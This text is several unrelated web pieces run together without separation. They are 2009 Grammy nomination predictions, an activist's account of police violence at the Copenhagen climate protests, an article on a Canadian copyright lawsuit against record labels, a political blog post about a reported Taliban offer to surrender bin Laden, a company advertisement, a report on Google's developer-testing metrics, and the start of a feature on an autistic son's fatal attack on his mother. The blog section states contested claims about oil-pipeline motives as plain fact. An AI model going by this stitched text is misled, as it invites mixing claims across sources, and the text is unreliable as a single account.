On A Dream is also worth mentioning , but once again there has been a lack of attention surrounding the album and it will most likely be relegated to the rock categories .
Regardless if there is a lack of strong contenders , the rock community has shown up for their own , landing nods this decade for mainstream acts like Coldplay , Foo Fighters , Green Day , Red Hot Chili Peppers , Evanesence and of course , U2 .
The two strongest options to represent rock are U2’s No Line On The Horizon and Green Day ’s 21st Century Breakdown .
In other years , bands like Wilco and Phoenix would have been legitimately considered for their efforts , but they were unlucky enough to release albums the same year as two of the Grammys ’ favorite bands .
Between U2 and Green Day this decade , they have a total of 10 nominations in the general categories , so the rock voting contingent will see to it that one of the two makes it .
Things get murky since neither of their albums measure up to the success of their previously nominated work , both commercially and critically , and they ’re not what you call AOTY contenders , with the fact that they ’re popular rock acts being their only saving grace .
In comparison , U2 has sold the most units , while Green Day ’s critical response has been slightly more enthusiastic .
Neither album has maintained the sort of visiblity that is typical of getting into this category , but I ’m giving the nod by the slimmest of margins to Green Day , if only because the singles have performed better on the charts and are more recognizeable than U2 ’s output this year .
Predictions :
Green Day : 21st Century Breakdown
Lady Gaga : The Fame
Maxwell : BLACKsummers ’night
Taylor Swift : Fearless
Kanye West : 808s & Heartbreak
Record Of The Year
As with Album Of The Year , both Lady Gaga and Taylor Swift have had amazing years and the love fest will continue here , where “ Poker Face ” and “ You Belong With Me ” will get nods , respectively .
They ’re both hugely popular songs that defined the year and that ’s usually what this category is about .
The same can be said for Black Eyed Peas ’ “ I Gotta Feeling . ”
Trying to escape this song during the summer was as hopeless as the planet making it out in one piece in a Roland Emmerich film .
It spent 14 straight weeks at No. 1 on the Hot 100 , and the only reasons why it ’ll probably get chosen over “ Boom Boom Pow , ” which preceded it on the charts by spending just a mere 12 straight weeks at the top , is because “ I Gotta Feeling ” features a clearly defined pop sound and has the more ubiquitous chorus of the two .
There ’s usually one rock song that makes it here , and one of the genre ’s biggest hits during the eligibility period was Kings of Leon ’s “ Use Somebody . ”
They ’re another group who had a big breakthrough and reached new heights of popularity .
They also won Best Rock Performance By A Duo Or Group With Vocals last year over Coldplay , Radiohead and The Eagles , which shows awareness with the voters .
Due to the success of “ Use Somebody , ” a nomination in the general category will be justified .
The only other rock songs that could possibly pose a threat are Green Day ’s “ 21 Guns ” and The Fray ’s “ You Found Me . ”
While both songs were bonafide hits , the gap in popularity between those tracks and “ Use Somebody ” is too large to ignore .
Record Of The Year is a typically crowded field , and this year is no different .
After the surprise nomination of M.I.A. ’s “ Paper Planes , ” pretty much anything is possible .
The song was more daring fare than what the academy usually rewards and its nomination shows that its willing to acknowledge creative work as long as it ’s a crossover smash .
The one song that could be this year ’s “ Paper Planes ” is Kid Cudi ’s “ Day ‘ N ’ Nite , ” which amazingly reached No. 4 .
The main difference between the songs is that “ Paper Planes ” was much more ingrained in the pop culture landscape .
Drake ’s “ Best I Ever Had ” also has a lot of momentum going for it since he continues to ride an insane amount of buzz , but some of its raunchier moments could probably keep it out of this usually squeaky clean category .
Kanye West ’s “ Heartless ” will also get some consideration , but since he failed to get a nomination for “ Stronger , ” it ’s hard to see how something with lesser popularity is going to make it .
If either one of them are riding a high wave of Grammy love , Maxwell ’s “ Pretty Wings ” and Whitney Houston ’s “ I Did n’t Know My Own Strength ” could benefit with ROTY nominations , but Song Of The Year nods seem more likely since this category tends to reward huge hits .
Jamie Foxx ’s collaboration with T - Pain , “ Blame It , ” will no doubt benefit from the roll call of A - listers in the video , which only increased the song ’s awareness , but there are stronger contenders from R&B and hip - hop this year .
Beyonce ’s “ Halo , ” which was a big hit in its own right , could benefit from the choice not to submit “ Single Ladies ( Put A Ring On It ) ” in this category .
Voters looking to reward her for a big year could select “ Halo ” as a default choice as a way of recognition .
There are n’t many reasons why “ Halo ” should n’t be nominated here , but the collaborative star power of two other songs , Keri Hilson ’s “ Knock You Down ” and Jay - Z ’s “ Run This Town ” could carry more appeal .
Both songs could easily be ROTY nominees , but it ’s unlikely that Kanye West will make two appearances in the same category , so only one will probably make it .
On one side , you have Keri Hilson and previous Grammy winners , Ne - Yo and Kanye West .
On the other , there ’s Jay - Z , Rihanna and Kanye West , all Grammy winners as well and household names .
“ Knock You Down ” may seem like the more favorable choice because of it ’s stronger hook and it ’s the type of song that usually gets nominated here , but Jay - Z has gotten more attention in the mainstream than probably any other moment in his career and for a lot of non-hip hop fans , he is the most recognizable face in the genre .
Since
The Blueprint 3 was released after the eligiblity period and will have to wait till next year to be considered for Album Of The Year , voters could use “ Run This Town ” as a way to pay respect for the year that he ’s had , and its chances are helped even more with the guest stars .
Predictions :
Black Eyed Peas : “ I Gotta Feeling ”
Jay - Z featuring Kanye West & Rihanna : “ Run This Town ”
Kings of Leon : “ Use Somebody ”
Lady Gaga : “ Poker Face ”
Taylor Swift : “ You Belong With Me ”
Best New Artist
Best New Artist has always been a crowded category because there is never a lack of debuts and artists who breakthrough despite having previous albums in their catalogue ( think Feist and Fountains of Wayne ) .
What makes this year especially crowded is the lack of big hits provided by those eligible .
Lady Gaga would have been a sure thing , but since she was nominated for Best Dance Recording last year , she does not qualify as a new artist according to the rules .
The only two new artists who had unquestionable success were Keri Hilson and Zac Brown Band .
Hilson garnered a pair of top 20 singles along with a gold album , while Zac Brown Band has spent most of the year in the upper reaches of the Top 200 and will represent the Nashville vote .
Beyond that , it ’s anyone ’s game .
With the lack of outright hits , the only clue is to look to past nominees to try and gauge which way the academy will go .
Nominations for Paramore and Fall Out Boy show that the Grammys are n’t afraid to acknowledge pop punk and the like , but only if they ’re at the head of the pack for rock in that year , which takes 3OH!3 , Jack ’s Mannequin and Cobra Starship out of the running .
Only one mainstream R&B act makes it here , so you can also say goodbye to Jeremih and Ryan Leslie .
The indie rock world usually yields some of the more higher quality contenders , but only if they have the sales or if a song gained mainstream attention through a popular ad or media placement ( refer to Feist ’s iPod commerical and Imogen Heap on The. O.C. ) .
That removes Matt & Kim , Grizzly Bear , Bon Iver and The Airborne Toxic Event .
All that ’s left are MGMT , Silversun Pickups and The Tings Tings as the main indie threats .
MGMT ’s “ Time To Pretend ” has been heard practically everywhere and the Justice remix for “ Electric Feel ” won for Best Remixed Recording , which should also be of note .
Silversun Pickups has the sales , but they do n’t have many songs that people know of outside of the rock community .
The Ting Tings have a top 40 single in “ That ’s Not My Name ” and several placements in television , not to mention an iTunes commercial for “ Shut Up And Let Me Go ” last year .
The reason why The Ting Tings seem like a more appropriate fit is because of the accessibility of the music ( MGMT might be too trippy for mass support ) and the members are more easily identifiable than those of Silversun Pickups with the general population .
Wale might see his name called on Dec. 2 , because he is one of the most popular names eligible , despite not having any hit songs .
He has gotten a ton of press on a consistent basis and that just might be enough considering the competition .
Other possibilities include Kristinia Debarge , who could get in solely on her last name and Owl City , based on the fact that he has a current top ten single .
Asher Roth ’s “ I Love College ” was able to get him some attention , but there has n’t been a ton of overwhelming support for his album .
While the Best New Artist field is incredibly weak this year , you can always bet on there being at least one female artist who either writes her own material or has an incredibly strong voice , or both .
Under that criteria , you ’re left with Diane Birch , Melanie Fiona , Laura Izibor , Jessie James , Ingrid Michaelson and Kate Voegele .
These names probably sound unfamiliar , but that just proves the point even further what a down year this has been .
Birch has a Starbucks quality that the Grammys tend to like , while Michaelson has had decent sales , along with her songs showing up in several television shows , but I ’m going to take a chance on Laura Izibor , if only because there has been a good amount of promotion behind her album — more so than Fiona , James and Voegele — and it ’s easily digestable .
Predictions :
Keri Hilson
Laura Izibor
The Ting Tings
Wale
Zac Brown Band
Song Of The Year
Since it was submitted for Record Of The Year , Beyonce ’s “ Single Ladies ( Put A Ring On It ) ” seems like an obvious choice here simply because of its popularity and with Estelle ’s nomination for “ American Boy ” last year , the door has been opened for uptempo songs in what is usually a ballad or acoustic driven category .
Whitney Houston ’s “ I Did n’t Know My Own Strength ” is the kind of uplifting song that is the norm here and given the context of the lyrics , it will probably strike a chord with voters .
This is the year of Taylor Swift , so a nod for “ You Belong With Me ” is also likely .
A few other strong contenders include modern rock hits “ You Found Me ” by The Fray , Green Day ’s “ 21 Guns ” and Kings of Leon ’s “ Use Somebody . ”
In this category , I would give the edge to “ You Found Me ” to represent rock based on that it ’s probably the more introspective and sentimental of the three , which Song Of The Year tends to favor .
There are still a good deal of contenders , but unlike Record Of The Year , more attention has to be paid to the song quality since this category has its own distinct vibe .
For one reason or another , U2 seem to always find themselved nominated here , but since it has n’t gotten as much airplay as their previous nominations in this category , “ I ’ll Go Crazy If I Do n’t Go Crazy Tonight ” will probably be relegated to the rock fields .
Adele ’s “ Hometown Glory ” is also another possible option after her wins last year and could benefit from previous momentum much the same way Corinne Bailey Rae did , who after getting nods in the general categories one year , was able to land one solo nod in SOTY for a song less popular than her big hit .
Keri Hilson ’s “ Knock You Down ” is another strong contender , but it seems unlikely that two uptempo songs will be nominated here .
A nomination for Miley Cyrus ’ “ The Climb ” would be a good way to boost ratings if she were to perform on the show , but it ’s also the kind of song voters eat up and could easily get a nod .
Maxwell ’s “ Pretty Wings ” will get a good deal of support , but the song is n’t as popular as some of its competition , so it will be a battle to make it here , but I do like its chances overall .
The reason why I like Kanye West ’s “ Heartless ” to get a nod is because it not only features a melodic hook and that whole introspective and sentimental thing that voters eat up , but it ’s also been covered by artists like The Fray and Kris Allen , showing the song ’s potential beyond hip hop and as a bonafide pop tune .
There ’s also the possibility of another Kanye / Taylor Swift showdown , which will only give the show more press .
Predictions :
Beyonce : “ Single Ladies ( Put A Ring On It ) ”
The Fray : “ You Found Me ”
Whitney Houston : “ I Did n’t Know My Own Strength ”
Taylor Swift : “ You Belong With Me ”
Kanye West : “ Heartless ”
Other Categories
Beyond the general categories , there are several other highly competitive races that will be getting a lot of attention .
Here are some more predictions :
Best Alternative Music / Album
Animal Collective : Merriweather Post Pavilion
Bjork : Volataic
Franz Ferdinand : Tonight
Phoenix : Wolfgang Amadeus Phoenix
Yeah Yeah Yeahs :
It ’s Blitz
This category tends to favor past nominees , with Phoenix and Animal Collective being the sole newcomers .
Bjork always gets nominated , no matter what .
Other possibilities : The Decemberists , Hazards Of Love ; The Dead Weather , Horehound ; Death Cab For Cutie , The Open Door ; Matt & Kim , Grand .
Best Rap / Sung Collaboration
Lil’ Wayne , Drake , Jae Millz , Gudda Gudda & Mack Maine : “ Every Girl ”
Jamie Foxx featuring T - Pain : “ Blame It ”
Keri Hilson featuring Ne - Yo & Kanye West : “ Knock You Down ”
Jay - Z featuring Kanye West & Rihanna : “ Run This Town ”
T.I. & Justin Timberlake : “ Dead and Gone ”
The biggest hits usually get the nods here , and some of these songs were the biggest hits of the year in any genre .
Other possibilities : Beyonce featuring Kanye West , “ Ego ” ; Black Eyed Peas , “ Boom Boom Pow ” ; Drake & Trey Songz , “ Successful . ”
Best Rap Group Performance
Busta Rhymes , Jadakiss & Lil’ Wayne : “ Respect My Conglomerate :
Eminem , 50 Cent & Dr. Dre : “ Crack A Bottle ”
Kid Cudi , Kanye West & Common : “ Make Her Say ”
Kanye West & Young Jeezy : “ Amazing ”
Ron Browz , Jim Jones & Juelz Santana : “ Pop Champagne ”
Once again , no true rap groups are nominated as collaborations have provided the bigger hits .
There ’s also only so much Kanye this category can take , as he could easily feel up all five slots .
Other possibilities : Birdman & Lil’ Wayne , “ Always Strapped ” ; Clipse & Kanye West , “ Kinda Like A Big Deal ” ; UGK , “ Da Game Been Good To Me . ”
Best Rap Song
Drake : “ Best I Ever Had ”
Eminem : “ Beautiful ”
Flo Rida : “ Right Round ”
Jay - Z featuring Kanye West & Rihanna : “ Run This Town ”
Kid Cudi : “ Day ‘ N’ Nite ”
Eminem always gets nominated in the rap categories .
Flo Rida was also nominated in this very category for “ Low , ” so no reason why “ Right Round ” wo n’t get a nod as well .
Other possibilities : Kanye West featuring Young Jeezy , “ Amazing ” ; Mos Def , “ Casa Bey ” ; T.I. & Justin Timberlake , “ Dead And Gone ” ; Asher Roth , “ I Love College . ”
Best Rap Album
Eminem : Relapse
Ludacris : Theater of the Mind
Mos Def : The Ecstatic
Q - Tip : The Renaissance
Rick Ross : Deeper Than Rap
Q - Tip , Eminem and Ludacris are names that are familiar with voters , and they released albums that were talked about .
Rick Ross is the true wild card .
Other possibilities : Common , Universal Mind Control ; Fabolous , Loso ’s Way ; UGK , UGK 4 Life .
Best Rap Solo Performance
Drake : “ Best I Ever Had ”
Jay - Z : “ D.O.A . ”
Kanye West : “ Heartless ”
Kid Cudi : “ Day N Nite ”
Asher Roth : “ I Love College ”
Drake and Kid Cudi had the undeniable hits , while Jay - Z and Kanye have the name recognition .
Asher Roth gets in because of how much of a crossover hit the song was .
Other possibilities : Common , “ Universal Mind Control ” ; Eminem , “ Beautiful ” ; Mos Def , “ Casa Bey ” ; Q - Tip , “ Move . ”
Best Dance Recording
Black Eyed Peas : “ Boom Boom Pow ”
David Guetta & Kelly Rowland : “ When Love Takes Over ”
Lady Gaga : “ Poker Face ”
Britney Spears : “ Womanizer ”
Pitbull : “ I Know You Want Me ( Calle Ocho ) ”
This category usually has a few smaller acts , but the year was crowded with big hits .
Other possibilities : Cascada , “ Evacuate the Dance Floor ” ; Calvin Harris , Dizzee Rascal & Chrome , “ Dance Wiv Me ” ; Madonna , “ Celebration ” ; MSTRKRFT , “ Bounce . ”
Best Electronic / Dance Album
Lady Gaga : The Fame
David Guetta : One Love
MSTRKRFT : Fist of God
Pet Shop Boys : Yes
Royksopp : Junior
Royksopp is the wildcard here , but they ’re veterans and could benefit from being a familiar name .
Other possibilities : Buraka Sound System , Black Diamond ; Ladyhawke , Ladyhawke ; LMFAO , Party Rock ; Peaches , I Feel Cream .
Best R&B Female Vocal Performance
Beyonce : “ Single Ladies ( Put A Ring On It ) ”
Mary J. Blige : “ Stronger ”
Whitney Houston : “ Million Dollar Bill ”
Chrisette Michele : “ Epiphany ”
Jazmine Sullivan : “ Lions , Tigers & Bears ”
Michele is a previous winner in Best Urban / Alternative Performance and Sullivan came out of nowhere to shock everyone with a Best New Artist nomination last year .
Not 100 % sure which Houston song will get the nod , but she is a lock for this category .
Other possibilities : Mariah Carey , “ Obsessed ” ; Keyshia Cole , “ You Complete Me ” ; Whitney Houston , “ I Look To You ” ; Laura Izibor , “ From My Heart To Yours . ”
Best Urban / Alternative Performance
Beyonce : “ Scared Of Lonely ”
Foreign Exchange : “ Daykeeper ”
India .
Arie & Dobet Gnahore : “ Pearls ”
Solange : “ This Bird ”
Sa-Ra Creative Partners f. Erykah Badu : “ Dirty Beauty ”
This category usually holds a few surprises because it ’s one of the more adventurous , but were are too many big names to ignore here .
Other possibilities : Anjulie , “ Boom ” ; Vikter Duplaix , “ Electric Love ” ; P.O.S. , “ Optimist ( We Are Not For Them ) . ”
Best R&B Song
Chrisette Michele : “ Epiphany ( I ’m Leaving ) ”
Jamie Foxx & T - Pain : “ Blame It ”
Keri Hilson featuring Kanye West & Ne - Yo : “ Knock You Down ”
Maxwell : “ Pretty Wings ”
Beyonce : “ Single Ladies ( Put A Ring On It ) ”
One of the toughest categories to predict because of the volume of hits submitted .
Beyonce will probably be the winner regardless of who gets nominated .
Other possibilities : Laura Izibor , “ From My Heart To Yours ” ; Jazmine Sullivan , “ Lions , Tigers & Bears ” ; Mariah Carey , “ Obsessed ” ; The - Dream , “ Rockin ’ That Thang . ”
Best Contemporary R&B Album
Beyonce : I Am…Sasha Fierce
Keyshia Cole : A Different Me
The - Dream : Love Vs. Money
Jamie Foxx : Intuition
Keri Hilson : In A Perfect World …
The predictions read like a list of who was the most popular in R&B over the year .
There probably wo n’t be any surprises on the scale of Karina being nominated like there was last year .
Other possibilities : Ciara : Fantasy Ride ; Electrik Red , How To Be A Lady Vol. 1 ; Ryan Leslie , Ryan Leslie .
Best Female Pop Vocal Performance
Beyonce : “ Halo ”
Sheryl Crow : “ Detours ”
Whitney Houston : “ I Did n’t Know My Own Strength ”
Shakira : “ She Wolf ”
Taylor Swift : “ You Belong With Me ”
Sheryl Crow seems to always find her way into this category .
The inclusion of Houston in the pop field complicates things , but voters will still likely want to see her do well .
Other possibilities : Adele , “ Hometown Glory ” ; Kelly Clarkson , “ Already Gone ” ; Miley Cyrus , “ The Climb ” ; Katy Perry , “ Hot N Cold ” ; Pink , “ Sober ” ; Britney Spears , “ Circus . ”
Photo Credit : Chris Owyoung / Prefixmag.com
Knives , pepper spray , beatings .
Comedian and activist Jonnie Marbles tells us about his alarming experiences at the front line of the Copenhagen protests .
by JonnieMarbles
" What are you doing ? " A security guard asks me .
My mind is swimming with the events of the last few days , and I am just waking up .
" I ’m going to The Bella Centre .
I need to stop the summit . "
I reply .
“ Do you know where you are ? ”
Three days ago I was marching through Ostebro , embedded in the Blue Bloc with the rest of my affinity group .
As we crossed the bridge on our final approach , as the protest arrived outside the most important talks the world had ever seen , we were quietly de-legalised .
They were supposed to give us three clear warnings , but here was a pattern that had become all too familiar : police failing to keep to even the flimsy rules that remained under the Danish emergency laws .
The march ground to a halt outside the main gates .
The riot vans closed in behind us and the cops kitted up .
Suddenly there was a flurry of activity .
A couple of dozen people began inflating Lilos and tying ropes .
The crowd came together as one , elated at the scent of energy .
Slowly it dawned upon them : we were going across the water between us and the Bella Centre .
It took just a few minutes before the bridge was floated and people began crawling across .
From our side of the canal , an activist - medic shouted warnings about the potentially lethal danger of falling into the drink .
From the police side cops fired pepper spray into the faces of those crawling across the structure .
Nevertheless , a few activists made it , straight into the snarling jaws of the dogs on the other side , and immediate arrest .
Word went round that the police had begun beating our comrades at the entrance to the Bella Centre , and we decided to join them in solidarity , using the bridge as a barricade .
Within seconds of our reaching the front line , the cops pulled knives and thrust them into the Lilos .
I shouted at the lines of armed police .
" Arrest that man !
Destruction of property !
Carrying an offensive weapon ! "
As our bridge deflated , the chant rose from our ranks :
" We Are Peaceful !
What Are You ?
We Are Peaceful !
What Are You ? "
They answered with a flourish batons raining blows indiscriminately into the crowd .
One of my new friends , a protester as peaceful as any you could ever meet , was being hit repeatedly .
Flushed with adrenaline , I threw myself between them .
It did n't matter to the man with the truncheon : any protester would do as a target .
I registered the pain , but did n't feel it .
Yet some primal part of me recognized the violence , and the sickly red rush of anger swam through my veins .
A lifelong commitment to peace was being steam - rollered by millions of years of evolution .
I felt the tug of my id at the back of my mind , urging me to push , to throw , to punish .
Thankfully events took over , and my group withdrew from the front .
We went to join the People ’s Assembly : an alternative summit , to which delegates from COP15 had been invited , that would propose real solutions to the problems of Climate Change .
Word went around that delegates who had tried to leave the Bella Centre and join our protest had been beaten , pepper sprayed and arrested .
I felt sick with fury and impotence , not just at the news , but at the knowledge that just a few days ago , I would not have believed such a thing could happen .
Now it seems normal .
Somehow this news - that internationally recognised diplomats were attacked and detained to prevent them joining a peaceful protest - has been quietly buried by the UK media .
The People ’s Assembly was rich with ideas , but without our friends from inside it was hard for it to be anything more than symbolic .
In the end , we marched away as one , crushed and euphoric all at once .
I did not know how to feel so I felt nothing , except the dregs of anger that still bubbled at the sight of every cop .
An hour or so later , at an activist info - point , a news report broke the surface tension of my inner turmoil .
" All we are asking for is the economic space to exist . " pleaded a South American delegate .
Perhaps it was the way that begging for scraps had been clothed in the language of neo-liberalism .
Perhaps it was the realisation that our action had failed to move the debate in a radical direction .
Perhaps it was just exhaustion and adrenaline .
Whatever the case , a wave of emotion coursed through me and I fell apart .
Tearful , my friends took me to trauma support where I crashed for a couple of hours .
The next few days were a blur of tiredness and frustration , as we discussed and refused to discuss our cumulative failure .
Leaving Copenhagen
I hear that the US is only offering 4 % cuts over 1990 levels .
Even this will not be legally binding .
The Copenhagen Accord is a whisper in a gale , a piece of crude and cynical gesture politics , a quiet acquiescence to genocide .
We have failed this time , as a movement and as a species , and no building of networks , no shift in our collective consciousness , no revolutionary friendship can truly compensate for this defeat .
My inner optimist rails against the futility of it all , a lonely internal protest trying to pull down the fence of facts that can not be denied .
The best I can say is that our work is unfinished .
I know a part of me will always yearn for the hope , the energy , and the lost opportunities of those few brave hours on the streets of Copenhagen .
" I ’m going to The Bella Centre .
I need to stop the conference . "
" Do you know where you are ? "
The security guard asks
I look around , and realize I have fallen asleep at Charing Cross .
The frenetic days and stunted nights have finally caught up with me .
The security guard looks confused .
" Well , we can't let you stay here .
It 's a suicide risk . "
Still bleary and jangled from sleep , I hear myself say :
" It 's too late .
Did n’t you hear ?
The world already committed suicide . "
He eyes me weirdly and walks away .
I am just waking up , and I slowly realise that I am wrong .
We did not commit suicide in Copenhagen .
We merely wrote the note .
Jonnie Marbles is not the real name of this writer , comedian , activist and dad from West London .
check out his superb blog at
...
Given how aggressively the recording industry likes to pursue file sharers , one would assume that the industry itself is in the clear when it comes to copyright infringement .
But that assumption has been put to the test in Canada , where a massive infringement lawsuit is brewing against some major players .
Members of the Canadian Recording Industry Association , including the Big Four ( Warner Music Canada , Sony BMG Music Canada , EMI Music Canada , and Universal Music Canada ) , face the prospect of damages ranging from $ 50 million up to $ 6 billion due to their use of artists ' music without permission .
That 's right : $ 6 billion .
The lawsuit in question goes back to October 2008 , but continues to be dragged up in the news because new plaintiffs keep joining the case .
Most recently , jazz musician Chet Baker 's estate has joined the growing list of musicians and artists who are getting on the music industry 's case for their abuse of a certain aspect of Canadian copyright practices — something that the labels themselves do n't even deny doing .
As University of Ottawa law professor Michael Geist pointed out on his blog , the issue stems from a change to the law in the 1980s that eventually produced something known as the " pending list . "
Essentially , record companies no longer had to get a compulsory license every time they wanted to use a song for , say , a compilation album .
Instead , they went ahead and used the song without waiting for authorization or making payment , adding the song to a list of music that is pending authorization and payment .
If you 're questioning whether you read that right , that basically means the record industries could use songs as long as they pinky swore they would get authorization and pay the artist for it eventually .
As you can imagine , the business did n't quite work that way .
Instead of keeping up with its tab on the pending list , the recording industry just kept adding songs — without obtaining any rights .
The pending list among the lawsuit 's defendants has topped 300,000 songs from both large and small artists alike — 300,000 songs that the labels are openly admitting that they have not secured the rights for .
In the complaint , the plaintiffs claim that the record companies have been unjustly enriched by the use of their unauthorized music ( they have , after all , been selling the music without permission and not paying out ) .
The plaintiffs also show that they are painfully aware of the hypocritical stance the industry has taken in regard to copyright abuse .
One part of the complaint says the companies have shown " reckless , high - handed and arrogant conduct aggravated by their clandestine disregard for the copyright interests of the class members in contrast to their strict compliance enforcement policy and unremitting approach to consumers in the protection of their corporate copyright interests . "
Ouch .
The recording companies targeted in the suit acknowledge that the pending list reflects unpaid royalties " in excess of $ 50 million , " but the real extent of the damage could go far higher — possibly to the tune of $ 6 billion .
This is because the class is asking for both statutory and punitive damages for the labels ' behavior ( as Geist points out , the same standards being used to go after individual file sharers ) , meaning that the labels could be asked to pay up to $ 20,000 per infringement .
For the first time , the Taliban offered to hand over Bin Laden for trial in a country other than the US without asking to see evidence first in return for a halt to the bombing , a source close to Pakistan 's military leadership said .
A senior Taliban minister has offered a last - minute deal to hand over Osama bin Laden during a secret visit to Islamabad , senior sources in Pakistan told the Guardian last night ...
Obama slipped past a real doozy Tuesday night when he said the Taliban refused to hand over bin Laden .
It just ai n't so .
They tried three times to open negotiations for this , but Bush refused each time .
He wanted to bomb people so bad it hurt .
The Taliban have offered to hand over Bin Laden before but only if sufficient evidence was presented .
Bin Laden is wanted both for the September 11 attacks and for masterminding the bombings of two US embassies in East Africa in 1998 in which 224 people were killed .
He is also suspected of involvement in other terrorist attacks , including the suicide bombing of the USS Cole in Yemen last year .
But until now the Taliban regime has consistently said it has not seen any convincing evidence to implicate the Saudi dissident in any crime .
" Now they have agreed to hand him over to a third country without the evidence being presented in advance , " the source close to the military said . "
Combined with so unhesitatingly waving the Al Qaeda boogey - man to make his case , in a fashion Bush would have been proud of , ( Al Qaeda is n't in Afghanistan ) it all makes me mighty suspicious .
The Taliban was n't declared an enemy until after 9/11 , even as we had evidence that bin Laden was behind the bombing of the USS Cole .
That 's because Bush 's buddies were still hoping to get the contract for the oil pipeline , which the Taliban government was refusing to give them .
These are just facts , I 'm not even trying to make an argument here .
But someone has to call them on these things .
The history is at the classic essay by Richard Behan which went viral on the internet soon after it was published ( re- printed at Afterdowningstreet.org ) :
Anytime .
Anywhere .
Work together .
Cedar Software Technologies , a web based software and creative services provider located in Kochi , India , has enviably marked its presence in the web development and designing areas .
The company believes in client centric approach and is committed to maintain a long lasting relationship with the client .
We deliver services of superior value and quality and ensure that all our endeavors are at par with the industry standards .
Mark Striebeck from Google opened XPDay 2009 today with a talk titled “ Developer testing , from the dark ages to the age of enlightenment ” .
Suggesting that software testing is today in a renaissance stage , Striebeck said that the community is now rediscovering “ ancient ” practices .
Most things we use in testing today were invented a long time ago , and then forgotten , said Striebeck .
In the last fifteen years , the community started rediscovering these practices and people were focused on advancing the art , not teaching .
As a result , there are many good testing practices out there but having testable code is still more an art than science , according to Striebeck .
Google had a team of Test Mercenaries , who joined different teams for a short period of time to help them with testing .
In most cases , they could see what was wrong after a few days and started helping the teams , but the effort was n’t a success .
When they left , teams would not improve significantly .
Striebeck said that testing “ was n’t effective to teach ” .
Knowing what makes a good test often relied on personal opinion and gut - feel .
Doing what they often do in similar situations , Striebeck said that they decided to collect data .
The things that they were interested in were figuring out the characteristics of good tests and testable code and how to know in the first place that a test is effective .
They decided to use a return - on - investment criteria : low investment ( easy to write , easy to maintain ) , high return ( alert to problems when it fails ) .
According to Striebeck , Google spends $ 100 M per year on test automation , and wanted an answer whether they are actually getting a good return on that investment .
They estimated that a bug found during TDD costs $ 5 to fix , which surges to $ 50 for tests during a full build and $ 500 during an integration test .
It goes to $ 5000 during a system test .
Fixing bugs earlier would save them an estimated $ 160 M per year .
To collect data , they set up a code - metrics storage to put all test execution analytics in a single place .
Striebeck pointed out that Google has a single code repository , which is completely open to all of the 10000 developers .
Although all systems are released independently ( with release release cycles randing from a week to a month ) , everything is built from HEAD without any binary releases , and the repository receives several thousand changes per day with spikes of 20 + changes per minute .
This resulted in 40 + millions of tests executed per day from a continuous integration service plus IDE and command line runs , they collected test results , coverage , build time , binary size , static analysis and complexity analysis .
Instead of anyone deciding whether a test is good or not , the system observed what people do with tests to rank them .
They looked into what a developer does after a test fails .
If the code was changed or added , the test was marked as good .
If people changes the test code when it fails , it was marked as a bad test ( especially if everyone is changing it ) .
This means that the test was brittle and has a high maintenance cost .
They also measured which tests are ignored in releases and which tests often failed in the continuous build and were n’t executed during development .
The first step was to provide developers reactive feedback on tests .
For example , the system suggested deleting tests that teams spent loads of time maintaining .
They then collected metrics on whether the people actually acted on suggestions or not .
The system also provided metrics to tech leads and managers to show how teams are doing with tests .
The second step , which is in progress at the moment , is to find patterns and indicators .
As they now have identified lots of good and bad tests , the system is looking for common characteristics among them .
Once these patterns are collected , algorithms will be designed to identify good and bad tests , and manually calibrated by experts .
The third step will be to provide constructive feedback to developers , telling developers how to improve tests , what tests to write an dhow to make the code more testable .
The fourth step in this effort will be to provide prognostic feedback , analysing code evolution patterns and warn developers that their change might result in a particular problem later on .
" To Whom it May Concern :
If this letter has been opened and is being read , it is because I have been seriously injured or killed by my son , Sky Walker . "
No one knows for sure when Trudy Steuernagel wrote that letter .
She read it to her ex-husband , Scott Walker , in the spring of 2008 , when their autistic son , Sky , had grown so violent she sometimes had to barricade herself in a closet .
By then , Trudy 's life had begun to feel a lot like that closet .
Small .
Dark .
Isolated .
Her ex-husband was gone , living in Wisconsin with his new wife and stepson .
Many of her friends were gone , too , lost to the demands she faced caring for Sky .
Sky remained .
But in a way , Sky was gone , too .
Over the years , he had slipped away from her , retreating into the shadows of autism .
The smart little boy who stole hearts with his smiles and hugs had disappeared .
Left behind was a 200 - pound teenager who overwhelmed her with his constant needs and his unpredictable , terrible anger .
Trudy spent her days teaching political science at Kent State University , where she was a popular professor .
She went home to Sky and long evenings of his ever more rigid routines , girding herself for his next meltdown , and hoping the next medication would bring Sky back .
That spring , as Sky 's violence increased , Trudy told Scott she had locked the letter in her home safe , in case the worst happened .
Less than a year later , it did .
On Jan. 29 , 2009 , sheriff 's deputies found Trudy on the floor of her kitchen , unconscious and struggling to breathe .
They found Sky in the basement , blood on his pajamas and feet .
The next day , Trudy 's brother , Bill Steuernagel , found the safe in Trudy 's closet .
The letter , a single folded page , loose in the pile of papers inside , would have been easy to overlook .
Trudy 's words were not .
Shot through with sorrow and regret , they bore witness to her fierce love for her child .
Trudy Steuernagel died eight days after the beating , at age 60 .
Sky , legally an adult at 18 but functionally a child , was charged with her murder and held at Portage County Jail while lawyers , social service agencies and the court tried to figure out what to do with him .
As the months went on , the story of the profoundly disabled son who unintentionally killed his mother unfolded like a Greek tragedy .
Sky 's life and Trudy 's death exposed some of the darkest mysteries of autism - from the puzzle of why a smart , capable woman sacrificed her own safety to keep her son at home to the larger legal and social issues presented by the perplexing , often hidden strain of violence in a neurological disorder that , more than 60 years after it was first described , continues to confound scientists .
" The nursery is finally finished .
Today , Nov. 9 , 1990 , was supposed to be your birthday .
Where are you , Sky Abbott Walker ?
About your name .
We both wanted a gender neutral name .
Pater loves all things to do with flying and I like nature names .
I hope you like it , Sky . " - Trudy Steuernagel , in Sky Walker 's Baby Book
Sky Abbott Walker was born Nov. 15 , 1990 .
Trudy was 42 and smitten .
She had been married just a year to Scott Walker , a former student of hers who was nine years younger .
Scott remembers
Trudy showing off her smiling , blue - eyed boy , who flirted with strangers and hit developmental marks ahead of the curve .
He walked at 9 months , and at 10 months he spoke individual words , knew the alphabet and could read letters .
Before his first birthday , he learned numbers and could add , subtract and count .
But then he stopped .
At 18 months , he still did not put two words together , and by 24 months , he had stopped acquiring new words .
When a doctor told Trudy and Scott that their son might have autism , they disagreed .
Did n't autism mean a lack of emotion and a resistance to touching ?
That was not Sky .
" He loved to hug not only his mom and me but his toddler friends and teachers , " Scott Walker remembers .
" So we said , ' There 's no failure to form attachments , he 's doing well . ' "
By the time he was 3 , they stopped fighting the diagnosis .
Sky was still not speaking in phrases or sentences , and he was losing words at a steady pace .
His early strides with reading letters and numbers turned out to be hyperlexia -- a red flag for autism .
